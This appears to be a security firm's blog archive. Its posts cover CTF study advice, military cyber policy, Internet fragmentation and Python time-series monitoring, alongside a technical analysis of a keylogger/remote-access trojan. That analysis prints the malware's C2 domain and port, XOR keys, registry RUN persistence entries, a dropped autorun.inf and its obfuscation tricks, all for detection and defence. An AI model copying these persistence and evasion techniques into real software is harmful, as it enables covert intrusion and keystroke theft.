3) ACM style programming. Pick a high level language. I recommend Python or Ruby. For Python, read Dive into Python (free) and find a pet project you want to participate in. It is worth noting that Metasploit is written in Ruby. Computer science classes dealing with algorithms and data structures will go a long way in this category as well. Look at past programming challenges from CTF and other competitions – do them! Focus on creating a working solution rather than the fastest or most elegant solution, especially if you are just getting started.

4) Web vulnerabilities. There are many web programming technologies out there. The most popular in CTF tend to be PHP and SQL. The php.net site is a fantastic language reference. Just search any function you are curious about. After PHP, the next most common way to see web challenges presented is with Python or Ruby scripts. Notice the overlap of skills? There is a good book on web vulnerabilities, The Web Application Hacker’s Handbook. Other than that, after learning some of the basic techniques, you might also think about gaining expertise in a few of the more popular free tools available. These are occasionally useful in CTF competitions too. This category also frequently overlaps with cryptography in my experience.

5) Binary exercises. This is my personal favorite. I recommend you go through reverse engineering before jumping into the binary exercises. There are a few common vulnerability types you can learn in isolation: stack overflows, heap overflows, and format string bugs for starters. A lot of this is training your mind to recognize vulnerable patterns. Looking at past vulnerabilities is a great way to pick up these patterns. You should also read through:

6) Forensics/networking. A lot of CTF teams tend to have “the” forensics guy. I am not that guy, but I suggest you learn how to use the 010 hex editor and don’t be afraid to make absurd, wild, random guesses as to what could be going on in some of these problems.

Finally, Dan Guido and company recently put out the CTF field guide, which is a great introduction to several of these topics.


Cyber and Strategic Landpower: Three Big Questions


Yesterday, I was the tech company voice on a panel with senior military officers, including LTG Edward Cardon, commander of the U.S. Army Cyber Command. Our topic was the role of cyber in support of strategic landpower, and the discussion (which was great) boiled down to three big issues for me:

  • What vulnerabilities will exist in the future force,
  • How can we ensure resilience in the face of those vulnerabilities, and
  • How can the Army build a culture that’s agile enough to succeed in the cyber world?

So here are some brief thoughts:

  • Vulnerabilities. For more than 25 years the military has talked about variations on the theme of total battle-space awareness – of increasing soldiers’ and commanders’ situational awareness by turning every platform (and I include individual people as platforms in this sense) into sensors. Military platforms are increasingly walking IP addresses, walking sensors, covered with radios, cameras, interactive maps, and – eventually – wearables and embedded technologies. Think of all these endpoints as cavalry doing constant reconnaissance, and that presents both huge opportunities for data collection and awareness and some significant vulnerabilities given these connections and our increasing reliance on them.
  • Resilience. Building secure systems is obviously essential, as is visualization so you can detect before deciding whether/how to respond, but really getting to “mil-spec” in this sense requires significant human components in addition to the technical ones. It’s useful to look to history when we talk about resilience for the military. I’d argue that we’ve always had some basic tenets of what constitutes resilience, and those are still useful here:
    • Excellence in the fundamentals. Land warfare hasn’t changed all that much since Thucydides; when the GPS fails, you still better know how to use a map and compass, and when the cyber systems fail, you still better know how to use a knife (hyperbolic, but making a point here…)
    • Jointness. Since Murphy’s Law always rules on the battlefield, we need to ensure one standard, one language, and maximum interoperability of systems. Remember that U.S. failures in Grenada in 1983 were a great catalyst for Goldwater-Nichols and the forced integration of the “Joint era.” We have a largely green-field opportunity now to build our cyber forces the right way from the start – emphasizing openness, ease of use, interoperability, and the ability to scale.
    • Training exercises. Only through rapid real-world iteration can we even begin to understand what resiliency looks like, and of course there’s no substitute for turning the map around and seeing what our cyber attack surface looks like from the adversary’s perspective. From a utility standpoint, therefore, there’s pretty significant convergence between offensive and defensive cyber capabilities for government actors – we can use offensive capabilities and learnings to test and strengthen our defenses.
  • Culture. This is where I feared being the skunk at the picnic. Having commanded military units in combat and now running a venture-backed software company, I’ve lived on both sides of the cultural chasm. So while I start with a basic skepticism about the military’s ability – culturally – to recruit and retain great cyber talent, I do think there are some things that can be done to better the odds:
    • First, we need to fix the acquisition process for software products or else we will effectively take the most innovative private sector solutions off the table. This should not be as hard as it seems. In terms of overall dollars, capital intensiveness, and program duration, software products are small projects compared with building ships and jets. I cannot speak to the legal and bureaucratic aspects of this change, but I did make one point about it from a philosophical perspective: the military must stop equating capability with cost – better stuff need not be more expensive stuff! Use the budgetary pressure of this downturn to replace the products and people that don’t work. And, unlike with massive systems, where I understand the need for some developmental burden-sharing, with most software products the vendors — not the government — should assume the technical and financial risk.
    • Second, we need to understand that cyber has a different talent base…but motivated by the same intangibles. You need to look for talent in different places (not always high school football teams), hold them to different standards (it doesn’t matter how many pull-ups they can do), and probably ought to consider tailored workplace cultures (0600 formation isn’t going to work in your favor). But they’re smart and committed, and they – like everyone else who takes that oath – will be forgoing other options and choosing public service because they believe in this country, they believe in their mission, and they believe in their comrades.
    • Third, we need to force the seniors to get granular. Waving hands about “all this cyber stuff” won’t cut it. Everyone in the room who wasn’t born digital is fooling himself or herself to think you can get where you need to be without making a commitment similar to that made by Captain Bull Halsey when he went to flight school because he and others saw the writing on the wall about the future of aviation for the Navy. We cannot afford to have a gap of another 10 or 20 years before we have enough granular understanding of cyber in the senior ranks.

Technical Analysis: Binary b41149.exe


In keeping with the theme of my previous post, “malware never truly dies – it just keeps on compromising”, today I’d like to investigate a binary that surfaced a couple of months ago. While the binary itself is young, the domain it reaches back to for Command and Control (CnC) has been used by nefarious binaries - like Cryp_SpyEye, AUTOIT.Trojan.Agent-9 and TROJ_SPNR - since at least October 2012. Hence, this is another example of how “old” malware continues to compromise long after it has been discovered.

What really caught my eye about this binary was one of its obfuscation techniques. The literal file name of the binary is unknown, so for the purposes of examining it, I renamed it b41149.exe after the first six characters of its SHA256 hash. The complete hash is provided later in the File Identifiers section.

An initial look at b41149.exe revealed it to be a custom-packed binary with an internal file name of “microsft.exe”, complete with a Microsoft icon (see Figure 1).


Figure 1: Binary Icon

Even more interesting was an embedded JPEG at offset 11930A. As of this writing, no purpose for this JPEG has been uncovered. Could this be some type of calling card? Figure 2 reflects the embedded JPEG in a hex view while Figure 3 displays the actual image file.


Figure 2: Hex View of Embedded JPEG


Figure 3: Embedded JPEG Inside b41149.exe

Another curious aspect of b41149.exe, and undoubtedly much more important than the JPEG, was the fact that it contained a Unicode-encoded binary between offset 508B and offset 117C0A. This is the part that really caught my eye. I’ve seen embedded binaries obfuscated in this manner primarily in RTF files, and also in PDFs and DOCs, but I personally haven’t come across one yet that used this obfuscation scheme while embedded inside another binary. It turns out the embedded binary is the real workhorse here, and Figure 4 reflects how it appears inside b41149.exe.


Figure 4: Unicode-encoded Binary Inside b41149.exe

B41149.EXE in Runtime

Upon execution, b41149.exe self-replicates to C:\WINDOWS\System32\mony\System.exe with hidden attributes. In addition, a visible command shell is opened. System.exe, the malware’s running process, then hooks to the malware-spawned command shell. Upon reboot, however, System.exe hooks to the default browser rather than a command shell, and since no browser window is opened, this is not visible to the affected user. Additionally, during runtime, b41149.exe self-replicates to six other locations throughout the system and creates one copy of itself that has the following 10 bytes appended to it: 0xFE154DE7184501CD2325. The binary also sets several registry values and stores encoded keylog data as logs.dat in the logged-on user’s %AppData% folder. Once loaded, the running process attempts to connect to a.servecounterstrike.com over port 115, and it persists on a victim host through a registry RUN key as well as through a copy of the binary in Start Up. The following table provides a chronological gist of the malware on a victim host during runtime.




Table 1: Chronological Gist of Malware on an Infected Host

As previously stated, the Unicode-encoded binary embedded inside b41149.exe (reflected in Figure 4) is the real power of this malware - it does all the heavy lifting. As a stand-alone binary, it will do everything described in Table 1 except the self-replications; the only copy it makes is %System%\mony\System.exe. In light of this, the remaining code in b41149.exe appears to be responsible for the other self-replications. However, before the embedded binary is functional as a stand-alone, the PE Header must be fixed and 1,391 4-byte blocks of 0x00002000 must be removed. These 4-byte blocks of ‘filler’ are inserted every 400 bytes. The exact reason for this is unknown, but I would guess it’s to hinder reversing efforts. Once fixed, however, the binary will run independently and without any degradation of maliciousness.
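To make the filler removal concrete, here is a minimal Python sketch. It is not the tooling used for this analysis. It assumes the filler bytes appear in the order printed above (00 00 20 00) and that exactly 400 payload bytes sit between consecutive filler blocks; both are guesses that would need checking against the sample. The name strip_filler is hypothetical, and the PE Header repair is not covered.

```python
FILLER = bytes.fromhex("00002000")  # assumed byte order, as printed in the post
STRIDE = 400                        # assumed payload bytes between filler blocks


def strip_filler(data: bytes, filler: bytes = FILLER, stride: int = STRIDE) -> bytes:
    """Drop a filler block that follows every `stride` bytes of payload."""
    out = bytearray()
    pos = 0
    while pos < len(data):
        # Copy the next run of payload bytes.
        out += data[pos:pos + stride]
        pos += stride
        # Skip the following bytes only if they really are the filler.
        if data[pos:pos + len(filler)] == filler:
            pos += len(filler)
    return bytes(out)
```

Checking for the filler before skipping it means an unexpected layout leaves the bytes in place rather than silently discarding real data.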

The keylogged data file, logs.dat, is encoded with a 30-byte key, but not in its entirety. Each new process, such as notepad, a command shell, browser, etc., spawns a new line of keylogged data. And each line is delimited with #### (or 0x23232323). The key is then applied to each new line, following the delimiter. Deep dive analysis has not yet been done to uncover the actual encoding algorithm or loop. However, the encoded logs.dat file can be decoded by applying the following 30-byte key after each delimiter: 0E0A0B16050E0B0E160A05020304040C010B0E160604160A0B0604130B16. Figure 5 contains a hex view sample of the encoded logs.dat file.


Figure 5: Hex View of Encoded Keylogged Data in LOGS.DAT

The following table demonstrates the decoding process for the first line of logs.dat. Each encoded byte is XOR’d with its corresponding byte from the key, producing the decoded byte. For example, 0x75 XOR 0x0E yields 0x7B; in ASCII, u becomes {.


Table 2: Keylogger Decoding Scheme

Since the encoded line in Table 2 was only 9 bytes long, only the first 9 bytes of the key were utilized. However, the key does not resume from byte 10 on the next line of encoded text. It starts back from the beginning of the key (e.g. 0x0E0A0B, etc.) and repeats until that line of data concludes. To illustrate this further, the following table presents three different lines of encoded ASCII text, each followed by its decoded version. The alphabetic characters of the decoded text are upper case/lower case inverted, while the numeric and special characters display normally.


Table 3: Decoded Keylog Data
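The decoding scheme described above can be sketched in a few lines of Python. This is an illustration under the stated behavior (XOR with the 30-byte key, key restarted after every #### delimiter and wrapped on long lines), not the malware's actual routine, which has not been reversed yet. The function names decode_line and decode_log are hypothetical.

```python
KEY = bytes.fromhex(
    "0E0A0B16050E0B0E160A05020304040C010B0E160604160A0B0604130B16"
)
DELIMITER = b"####"  # 0x23232323


def decode_line(encoded: bytes, key: bytes = KEY) -> bytes:
    """XOR one line with the key, starting at key[0] and wrapping as needed."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(encoded))


def decode_log(raw: bytes) -> list:
    """Split on the delimiter and decode every non-empty line independently."""
    return [decode_line(line) for line in raw.split(DELIMITER) if line]
```

Because the decoded letters come out case-inverted, calling swapcase() on each decoded line should restore the text as typed, assuming the inversion applies uniformly to every alphabetic character.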

The most critical component of this malware runs in memory, but it’s written to disc ever so briefly by b41149.exe. The temporary file, “XX—XX—XX.txt”, is resident on the system for only a fraction of a second in the logged-on user’s %Temp% directory. Once running, the malware-spawned command shell deletes it (as reflected above in Table 1). XX—XX—XX.txt is XOR encoded with 0xBC, and once decoded, it contains the name of the reach back CnC domain a.servecounterstrike.com, as well as a UPX-packed dynamic link library (DLL) file. Strings of the DLL suggest it contains remote access tool (RAT) capability. In addition, since the DLL runs in memory, and XX—XX—XX.txt does not remain resident on the victim host, its presence could be difficult to determine.

The beginning of XX—XX—XX.txt displays the un-encoded file structure path from where the malware was executed. This string is followed by the path of the running process, which is the self-replicated System.exe. Immediately after is where the XOR encoded CnC reach back domain and the connection port are located. A single byte XOR key, 0xBC, is used for this, and Figure 6 reflects a “before and after” encoding look at the beginning portion of XX—XX—XX.txt.


Figure 6: XX—XX—XX.txt Before and After Encoding

The DLL embedded inside XX—XX—XX.txt is near offset 1C192, but this is dependent upon the length of the path name from which the malware was executed. Figure 7 reflects a “before and after” encoding look at the embedded DLL’s DOS stub.


Figure 7: XOR Encoded DOS Stub Inside XX—XX—XX.TXT
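Since the offset of the embedded DLL shifts with the length of the execution path, one way to locate it in a captured copy of the temporary file is to search for a known plaintext string in its XOR-encoded form. The Python sketch below assumes the DLL keeps the standard DOS stub message, which Figure 7 suggests but which is not guaranteed for every sample. The helper names are hypothetical.

```python
XOR_KEY = 0xBC
DOS_STUB = b"This program cannot be run in DOS mode"


def xor_single_byte(data: bytes, key: int = XOR_KEY) -> bytes:
    """Apply a single-byte XOR; the same call encodes and decodes."""
    return bytes(b ^ key for b in data)


def find_encoded(blob: bytes, needle: bytes, key: int = XOR_KEY) -> int:
    """Return the offset of `needle` as it appears XOR-encoded in `blob`, or -1."""
    return blob.find(xor_single_byte(needle, key))
```

Searching for the encoded needle leaves the un-encoded path strings at the start of the file untouched, and the same helper can be pointed at the CnC domain string instead of the DOS stub.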

As stated above, the DLL is UPX packed, but once unpacked, it reveals some interesting strings that provide some insight into its functionality. Table 4 lists some strings of interest.


Table 4: Strings of Interest

Persistency is a key component of malware, and b41149.exe persists on the victim host through several mechanisms, such as the following registry RUN keys:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\Policies:"C:\WINDOWS\system32\mony\System.exe"
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HKLM:"C:\WINDOWS\system32\mony\System.exe"

In addition, a copy of the binary is stored in the user’s Start Up folder as WinUpdater.exe. However, 10 bytes are appended to the binary, as shown in Figure 8.


Figure 8: Trailing Byte Comparison of B41149.EXE / WINUPDATER.EXE

An autorun.inf file is also created in the root of the C:\ directory. Below is the content of the INF file, which opens apphelp.exe - also located in the root of C.

[autorun]
open=apphelp.
ACTION=Perform a Virus Scan

One unusual aspect of this malware is that while the main action takes place in memory, it is actually very noisy in terms of activity on the victim host. It writes, deletes, then rewrites two files in rapid succession to the logged-on user’s %Temp% directory. The files are XxX.xXx and UuU.uUu. Each file contains the current timestamp of the victim host in an HH:MM:SS format. No other data is contained within those files. Interestingly, XxX.xXx is rewritten at half-second intervals, while UuU.uUu is rewritten every five seconds. Figure 9 displays the contents of these files captured moments apart from one another.


Figure 9: Content of XXX.XXX AND UUU.UUU

The most obvious sign of something being not quite right here is that upon execution, this binary spawns a command shell window for the user and everyone else to see. The shell is not user-interactive, because it cannot be typed in. However, if the shell is closed (or terminated), the malicious process, C:\WINDOWS\system32\mony\System.exe, restarts automatically. Interestingly, upon system reboot, the malicious process System.exe hooks to the default browser and runs as previously described, but it does not spawn a browser window. It’s possible that the visible command shell window is intended to trick the user into thinking there’s something wrong with the system, thus prompting a reboot.

Network Activity

As previously stated, the binary connects to a.servecounterstrike.com, which is compiled in memory. Upon execution of the binary, the victim host sends a DNS query for a.servecounterstrike.com, and once an IP address is returned, it begins sending periodic SYN packets to that address over port 115, presumably until the attacker responds or until it receives further commands from its CnC node. Figure 10 shows the PCAP of a compromised host’s initial connection with the malicious domain. This activity was captured from within an enclosed virtual network.


Figure 10: Initial Connection from a Compromised Host

During the short period in which the compromised virtual machine was left online, no return attacker activity occurred, so it’s undetermined what would transpire in the long term if this were an actual compromised online host.

Stay tuned for a follow-up post once I do some deeper dive analysis of this binary. For now, I’ll leave you with some hashes. Enjoy.

File Identifiers

File: b41149.exe
Size: 1343488
MD5: f20b42fc2043bbc4dcd216f94adf6dd8
SHA1: 4d597d27e8a0b71276aee0dcd8c5fe5c2db094b0
SHA256: b41149a0142d04ac294e364131aa7d8b9cb1fd921e70f1ed263d9b5431c240a5
ssdeep: 6144:hEnCDKEJkKspH02n/M+WJ/04KLuqju11M+HDKsR:h9DdspH02004fqjujM+HGs
Compile Time: 4F605417 (Wed, 14 March 2012 08:17:27 UTC)
Compile Version: Microsoft Visual Basic 5.0 / 6.0
Internal File Name: Microsft.exe

File: embedded_ascii-encoded_bianry.exe (with fixed PE Header and “filler” byte blocks removed)
Size: 277869
MD5: a47d9f42a1a1c69bc3e1537fa9fa9c92
SHA1: b2d588a96e29b0128e9691ffdae0db162ea8db2b
SHA256: c17cb986ccd5b460757b8dbff1d7c87cd65157cf8203e309527a3e0d26db07e3
ssdeep: 6144:8k4qmyY+DAZCgIqiEM3OQFUrsyvfEUKMnqVZ:P9wQuCvjdordEGn6

File: c:\WINDOWS\system32\mony\System.exe (dropped by embedded Unicode encoded binary)
Size: 277869
MD5: a47d9f42a1a1c69bc3e1537fa9fa9c92
SHA1: b2d588a96e29b0128e9691ffdae0db162ea8db2b
SHA256: c17cb986ccd5b460757b8dbff1d7c87cd65157cf8203e309527a3e0d26db07e3
ssdeep: 6144:8k4qmyY+DAZCgIqiEM3OQFUrsyvfEUKMnqVZ:P9wQuCvjdordEGn6

File: embedded DLL in XX–XX–XX.txt
Size: 120320
MD5: c1bc1dfc1edf85e663718f38aac79fff
SHA1: 9d01c6d2b9512720ea7723e7dec5e3f6029aee3d
SHA256: 5468be638be5902eb3d30ce8b01b1ac34b1ee26b97711f6bca95a03de5b0db24
ssdeep: 3072:dk7/I/KbMm4oIP9zaj1WyWBiyhdYKC0iwsUukhh3a:dkDuK4m4jWjv+nCksfQB

File: embedded DLL in XX–XX–XX.txt (unpacked)
Size: 329728
MD5: f920cee005589f150856d311b4e5d363
SHA1: 2589fa5536331a53e9a264dd630af2bdb6f6fc00
SHA256: 1fd16ca095f1557cc8848b36633d4c570b10a2be26ec89d8a339c63c150d3b44
ssdeep: 6144:iQoh1rcU8kHOEkzsz+F97pk1nJJn7TB82R:j2RbHOEkzsaXmxn7T
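For anyone who wants to compare a sample against the identifiers above, the size and the three cryptographic hashes can be computed with Python's standard hashlib module. The sketch below also derives a short name from the first six characters of the SHA256, mirroring the b41149.exe naming used in this post. The function name file_identifiers and the short_name field are hypothetical, and ssdeep is left out because it needs a third-party library.

```python
import hashlib


def file_identifiers(data: bytes) -> dict:
    """Compute size, MD5, SHA1, and SHA256, plus a short hash-based name."""
    sha256 = hashlib.sha256(data).hexdigest()
    return {
        "size": len(data),
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": sha256,
        # First six hex characters of the SHA256, as in b41149.exe.
        "short_name": sha256[:6] + ".exe",
    }
```

Reading a sample with open(path, "rb").read() and passing the bytes in is enough for files of this size.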

The Great Divide: Closing the Gap in Cyber Analysis


In 2010, General Michael Flynn co-authored a report entitled Fixing Intel, critiquing the threat-centric emphasis within counterinsurgency intelligence analysis. The report, which made waves in the intelligence community (IC), called for an organizational and cultural shift within the analytical and operational approach to counterinsurgency, highlighting the gap in data collection and the resulting lack of holistic situational awareness critical for decision-making. Recently, the Chief Analytic Methodologist at DIA, Josh Kerbel, reinforced these arguments while extending them beyond counterinsurgency to apply to all missions across the IC writ large. Noting that the IC is at a Kodak moment, he argues that the IC must move beyond the Cold War business model and modernize in light of the dynamic and diverse threats present in the current operating environment.

Having spent a significant amount of time both as an analyst and interviewing analysts across a wide range of intelligence agencies and Combatant Commands, I now see significant parallels within the cyber domain. While cyber is a much more nascent field, it is already widely recognized that there is a gap between the very tactical and technical nature of the cyber domain and the information relayed to leadership. The DoD’s inclusion of cyberspace as an official domain of warfare certainly indicates its relevance for the foreseeable future and there are plenty of lessons to learn, both from the CT realm as well as from the larger IC perspective, in order to make cyber analysis relevant for leadership. Two of the most pertinent lessons, which I’ll address in further detail, are: 1) contextualizing challenges and 2) translation between practitioners and leadership.

1) Contextualization: As both Kerbel and the Flynn report note, for more than a decade the IC has been preoccupied with a threat-centric view of terrorism, which in turn focuses on targeted collection. Similarly, the cyber domain currently seems to take a threat-centric approach, again with an emphasis on targeted collection. In both cases, an emphasis on the nodes omits the larger picture that leadership requires to make informed decisions. It is indicative of the proverbial inability to see the forest for the trees. Nevertheless, cyber intelligence should cross the strategic, operational, and tactical domains to provide insight at each level of analysis. There is great utility in both private and public organizations understanding the larger picture and context of the cyber challenges within the operating environment.

2) Translation required: Kerbel emphasizes the behavioral component of customer-driven production, noting analysts must understand what the policymakers are trying to accomplish and provide a service that meets those needs. This, he argues, is counter to the current strategy of assuming relevance of a product because it is based on unique information. This is identical to the disciplinary gaps seen today in the cyber domain. Too often, the hyper-technical delivery of cyber information and analysis to leadership is packaged in a language and format that quite simply are not useful for decision makers. Insights from cyber analysis will not reach their full potential if we cannot transform the technical jargon into a language that leaders can understand. Fixing Intel notes that the IC “is a culture that is strangely oblivious of how little its analytical products, as they now exist, actually influence commanders.” This gap arguably already haunts the cyber domain, where very technical products are either not directly relevant for or are incomprehensible to leadership. Until this necessary translation happens, and until we can move towards a common framework for the cyber domain, the divide between the cyber analysis and policy communities, and between leadership and cyber practitioners, will remain.

Analysis: Three Observations About the Rise of the State in Shaping Cyberspace


Last month commemorated the 100th anniversary of the start of World War I. It was a time when states were so interdependent and borders so porous that some call it the first era of globalization. In fact, immediately prior to World War I, many forecast that interdependence would be the predominant driving force for the foreseeable future, diminishing states’ tendencies toward war and nationalism. World War I immediately halted this extensive global interdependence, in large part due to rising nationalism and the growth of inward-facing policies. On the surface, there seems to be little in common between that era and the current Digital Age. However, the misguided presumption prior to World War I that interdependence would render states’ domestic interests obsolete is at risk of resurfacing in the cyber domain. Given the narrow focus on connectivity during previous waves of interdependence, here are three observations about the role of the state in the Digital Age worth considering:

1) In “borderless” cyberspace, national borders still matter. Similar to perspectives on the growth of interdependence prior to World War I, there is currently an emphasis on the borderless, connected nature of cyberspace and its uniform and omnipresent growth across the globe. While borders – both virtual and physical – have become more porous, the state nevertheless is increasingly impacting the structure and transparency of the Internet. From Russia’s recent expansion of web control to Brazilian-European cooperation for underground cables, there is a growing patchwork approach to the Internet – all guided by national interests to maintain control within state borders.

2) “Data Nationalism” is the new nationalism of the Digital Age. While traditional nationalism still exists, thanks to the information revolution it now manifests in more nuanced ways. “Data nationalism”, where countries seek to maintain control of data within their physical borders, has strong parallels to traditional nationalism. In both cases, nationalism serves as a means to shape and impact a state’s culture and identity. As history has shown, states – and the governments running them – aim to maintain sovereign control of their territory and stay in power. Nationalistic tendencies, especially state preservation, tend to strongly influence the depth and structure of connectivity among people and states. This was true one hundred years ago, and it is true today. States are disparately invoking national legislation and barriers to exert their “data nationalism” within a virtual world, possibly halting the great expansion of access and content that has occurred thus far. Just as nationalism and states’ interests eventually altered the path of the first era of globalization, it is essential to acknowledge the growing role of the state in shaping the Internet during the Digital Age.

3) Although a technical creation, the cyber domain is not immune from the social construct of states’ interests. During each big wave of globalization and technological revolution, the idea that interdependence will triumph and trump individual states’ interests emerges. However, this idea discounts the role of the state in continuing to shape and maintain sovereign control while simultaneously influencing the structure of the newly connected system. This is true even in the cyber realm, which is not immune to the self-interest of states. From the great firewall of China to various regulations over content in Western European countries to Internet blackouts in Venezuela, states are increasingly leveraging their power to influence Internet access and control data and content within their borders. This has led to a growing discussion of the “Splinternet” or Balkanization of the Internet, which refers to the disparate patchwork of national policies and regulations emerging globally. Running counter to the ideals of openness and transparency on which the Internet was founded, it comes as no surprise to international relations scholars that states would seek to control (as best as possible) the cyber domain.

The role of self-interested states has largely been absent from discussions pertaining to the future of the Internet. Fortunately, there is a growing dialogue on the impact of national barriers and disparate national legislation on the Internet’s evolution. A recent article in The Atlantic reflects on the growing fractionalization of the Internet, and is reminiscent of earlier eras’ articles about the hub-and-spoke system of international trade. Similarly, a Pew Research Center poll highlights concern over the potential fractionalization of the Internet due to state intervention. As we continue to consider how the Internet will evolve and how policymakers will respond to an increasingly interconnected digital domain, we must not ignore the inherent tendency of states to demarcate both physical and virtual control within their sovereign borders.

 

Time Series Analysis for Network Security


Last week, I had the opportunity to attend a conference that had been on my radar for a long time. I’ve been using scientific Python tools for about 10 years, so it was with great excitement that I attended SciPy 2014 in Austin. I enjoyed meeting the developers of this excellent open-source software as well as other enthusiastic users like me. I learned a great deal from talks about some Python tools I haven’t yet tried but should really already be using, like conda, bokeh, and others. I also gave a talk describing how I have been using the SciPy stack of software in my work here at Endgame. In this post, I’ll summarize and expand on the first half of my presentation.

My work at Endgame has focused on collecting and tracking metrics associated with network and device behavior. By developing a model of normal behavior on these metrics, I can find and alert users when that behavior changes. There are several examples of security threats and events that would lead to anomalies in these metrics. Finding them and alerting our users to these threats as soon as possible is critical.

The first step in finding anomalies in network and device behavior is collecting the data and organizing it into a collection of time series. Our data pipeline here at Endgame changes rapidly as we develop tools and figure out what works and what doesn’t. For the purposes of this example, the network traffic data flows in the following way:

Apache Kafka is a distributed messaging system that views messages as a log. As data comes in, Kafka takes care of receiving it and distributing it to other systems that have subscribed to it. A separate system archives this data to HDFS for later processing over historical records. Reading the data from the Kafka servers allows my database to stay as current as possible. This allows me to send alerts to users very soon after a potential problem occurs. Reading historical data from HDFS allows me to backfill metrics once I create a new one or modify an existing one. After all of this data is read and processed, I fill a Redis database with the time series of each metric I’m tracking.

The three Python tools that I use throughout this process are kairos to manage the time series database, kafka-python to read from Kafka, and pyspark to read from HDFS. I chose each project for its ease of use and ability to get up to speed quickly. They all have simple interfaces that abstract away complicated behavior and allow you to focus on your own data flow. Also, by using a Python interface to old and new data, I can share the code that processes and compares data against the metrics I’ve developed.

I gave my presentation on the third and final day of SciPy. Up until that point, I hadn’t heard Apache Spark or pyspark mentioned once. Because of this, I spent an extra minute or two evangelizing for the project. Later, the Blaze developers gave a similar endorsement. It’s good to know that I’m not alone in the scientific Python community in loving Spark. In fact, before using Spark, I had been running Pig scripts in order to collect historical data. This required a bunch of extra work to run the data through the Python processing scripts I had already developed for the real-time side of things. Using Spark definitely simplified this process.

The end result of all this work is an easily accessible store of all the metrics. With just a couple lines of code, I can extract the metric I’m interested in and convert it to a pandas Dataframe. From there, I can simply analyze it using all of the scientific computing tools available in Python. Here’s an example:

# Make a connection to our kairos database
from redis import Redis
from kairos import Timeseries

intervals = {"days": {"step": 60, "steps": 2880}, "months": {"step": 1800, "steps": 4032}}
rclient = Redis("localhost", 6379)
ktseries = Timeseries(rclient, type="histogram", intervals=intervals)

# Read data from our kairos database
from pandas import DataFrame, to_datetime

# metric_name holds the name of the metric to read
series = ktseries.series(metric_name, "months")
ts, fields = zip(*series.items())
df = DataFrame({"data": fields}, index=to_datetime(ts, unit="s"))
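As a quick sanity check on the intervals configuration in the snippet above, the arithmetic below works out how much history each interval would cover. It assumes that step is a bucket width in seconds and that steps is the number of buckets retained, which is my reading of the kairos configuration rather than something verified here. The helper name retention is hypothetical.

```python
from datetime import timedelta

intervals = {
    "days": {"step": 60, "steps": 2880},
    "months": {"step": 1800, "steps": 4032},
}


def retention(interval: dict) -> timedelta:
    """Span covered by `steps` buckets that are `step` seconds wide."""
    return timedelta(seconds=interval["step"] * interval["steps"])
```

Under that reading, the "days" interval holds one-minute buckets for two days, and the "months" interval holds half-hour buckets for 84 days.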

And here’s an example time series showing the number of times an IP has responded to connection requests:

Thanks for reading. Next week I’ll talk about the different models I’ve built to make predictions and find anomalies in the time series that I’ve collected. If you’re interested in viewing the slides from my presentation, I’ve shared them here.
